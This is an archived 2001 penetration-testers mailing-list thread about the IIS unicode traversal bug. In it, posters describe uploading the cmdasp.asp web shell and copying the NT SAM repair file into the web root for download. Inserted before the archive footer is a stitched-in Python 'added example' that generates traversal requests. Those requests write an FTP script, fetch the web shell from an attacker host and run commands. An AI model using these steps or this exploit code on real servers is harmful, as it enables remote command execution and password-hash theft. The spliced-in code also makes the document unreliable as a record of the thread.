Ahh.. so you can basically echo a bunch of ftp commands to a file, run the ftp client -s:filename.txt to have the box download cmdasp.asp, and then you can just have that page execute commands? Nice.

On 08.09.01, "Sapiro, Benjamin R" <bsapiroat_private> wrote:
> Tony
>
> Under IIS4, CMDASP.asp executes in system level context so you are able to
> do that (CMDASP.asp has nothing to do with the unicode vuln. itself, we just
> use unicode attacks to get script up onto the box). You are right though, a
> unicode executed command by itself runs under IUSR context
>
> Ben Sapiro
> Information Risk Management
> (416) 777-8025
> www.kpmg.ca/irm
>
>
> -----Original Message-----
> From: Tony Lambiris [mailto:methodicat_private]
> Sent: Wednesday, August 08, 2001 1:46 PM
> To: Penetration Testers
> Subject: Re: Pwdump2 with UNICODE?
>
>
> I thought under UNICODE, you aren't able to run such commands as rdisk
> and pwdump, because IIS runs as IUSR?
>
> On 08.07.01, Kevin Lam <kevinlam@packet-works.com> wrote:
> > Hi Allen,
> >
> > If you have UNICODE working, you could upload cmdasp.asp which will let
> > you execute commands on that server.
> >
> > If this is NT then what you can do is run "rdisk /s-" to silently update
> > the repair sam._ file (this is a little trick that I used to use when I
> > did pen-testing for Deloitte). Then go to c:\winnt\repair and copy
> > sam._ to say a public internet folder like c:\inetpub\wwwroot and then
> > go to your browser and just download the file.
> >
> ******************************************************************************
> The information in this email is confidential and may be legally privileged.
> It is intended solely for the addressee. Access to this email by anyone else
> is unauthorized.
>
> If you are not the intended recipient, any disclosure, copying, distribution
> or any action taken or omitted to be taken in reliance on it, is prohibited
> and may be unlawful. When addressed to our clients any opinions or advice
> contained in this email are subject to the terms and conditions expressed in
> the governing KPMG client engagement contract.
> ******************************************************************************

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
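The staging chain the thread describes, written out as an added example (this is not code from any of the posters): the ftp.exe "-s:" script, the cmd.exe echo lines that write it one request at a time, and the traversal request that carries each command. The second half shows why the IIS unicode bug worked at all: "%c0%af" is the overlong two-byte UTF-8 encoding of "/" from the original IIS unicode advisory (MS00-078); a strict decoder rejects it, so the path check sees no "..", while the lenient decoder on the file-system side turns it into "/". The FTP host, the drop directory under c:\inetpub\scripts, the script file name and the anonymous login are assumptions for illustration.

```python
"""Added example, not from the original thread: stage an FTP script through
the IIS unicode traversal and show why %c0%af slipped past the path check.
Host, paths, file names and the anonymous login are assumptions."""
from urllib.parse import quote_plus, unquote_plus, unquote_to_bytes

FTP_HOST = "192.0.2.10"                       # assumed attacker FTP server
SCRIPT_FILE = r"c:\inetpub\scripts\ftp.txt"   # assumed path writable by IUSR
DROP_DIR = r"c:\inetpub\scripts"              # assumed executable vroot
PAYLOAD = "cmdasp.asp"

# Path prefix of the traversal request: ".." + "%c0%af" + ".." steps up two
# directories once a lenient decoder turns %c0%af into '/'.
TRAVERSAL = "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+"


def ftp_script(host, drop_dir, filename):
    """Lines of an 'ftp -s:' script: anonymous login, binary mode,
    change the local directory to drop_dir, fetch one file, quit."""
    return ["open " + host, "anonymous", "guest@example.com", "bin",
            "lcd " + drop_dir, "get " + filename, "bye"]


def staging_commands(host=FTP_HOST, script=SCRIPT_FILE,
                     drop_dir=DROP_DIR, filename=PAYLOAD):
    """cmd.exe commands that write the script one line per request
    ('>' creates the file, '>>' appends) and then run ftp.exe on it."""
    cmds = []
    for i, line in enumerate(ftp_script(host, drop_dir, filename)):
        cmds.append(f"echo {line} {'>' if i == 0 else '>>'} {script}")
    cmds.append(f"ftp -s:{script}")
    return cmds


def traversal_request(cmd):
    """Request path for one command; the command rides in the query
    string with spaces as '+', the way the cmd.exe trick was used."""
    return TRAVERSAL + quote_plus(cmd)


def decode_command(request):
    """Recover the cmd.exe command from a request built above."""
    return unquote_plus(request.split("?/c+", 1)[1])


def strict_path(request):
    """What a correct UTF-8 decoder sees: 0xC0 0xAF is an overlong
    (invalid) encoding of '/', so both bytes become U+FFFD and no '..'
    path segment appears."""
    raw = request.split("?", 1)[0]
    return unquote_to_bytes(raw).decode("utf-8", errors="replace")


def lenient_path(request):
    """A decoder that accepts overlong two-byte sequences, like the
    vulnerable IIS code path: ((0xC0 & 0x1F) << 6) | (0xAF & 0x3F) == 0x2F."""
    b = unquote_to_bytes(request.split("?", 1)[0])
    out, i = [], 0
    while i < len(b):
        c = b[i]
        if 0xC0 <= c < 0xE0 and i + 1 < len(b) and 0x80 <= b[i + 1] < 0xC0:
            out.append(chr(((c & 0x1F) << 6) | (b[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(c))
            i += 1
    return "".join(out)


def escapes_vroot(path):
    """Canonicalization check: does the path climb above its root?"""
    depth = 0
    for seg in path.replace("\\", "/").split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


if __name__ == "__main__":
    for cmd in staging_commands():
        print(traversal_request(cmd))
    req = traversal_request("dir")
    print("strict :", strict_path(req), escapes_vroot(strict_path(req)))
    print("lenient:", lenient_path(req), escapes_vroot(lenient_path(req)))
```

Each echo line is one HTTP request, so the script is built in seven round trips and the eighth request runs ftp.exe; everything up to this point still runs as IUSR, which is exactly Tony's objection, and it is only the uploaded cmdasp.asp that Ben says runs as SYSTEM on IIS4. The two decoders are the whole lesson: a check that runs on the strictly decoded string and a file system that gets the leniently decoded one disagree about the same bytes.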
This archive was generated by hypermail 2b30 : Thu Aug 09 2001 - 15:42:27 PDT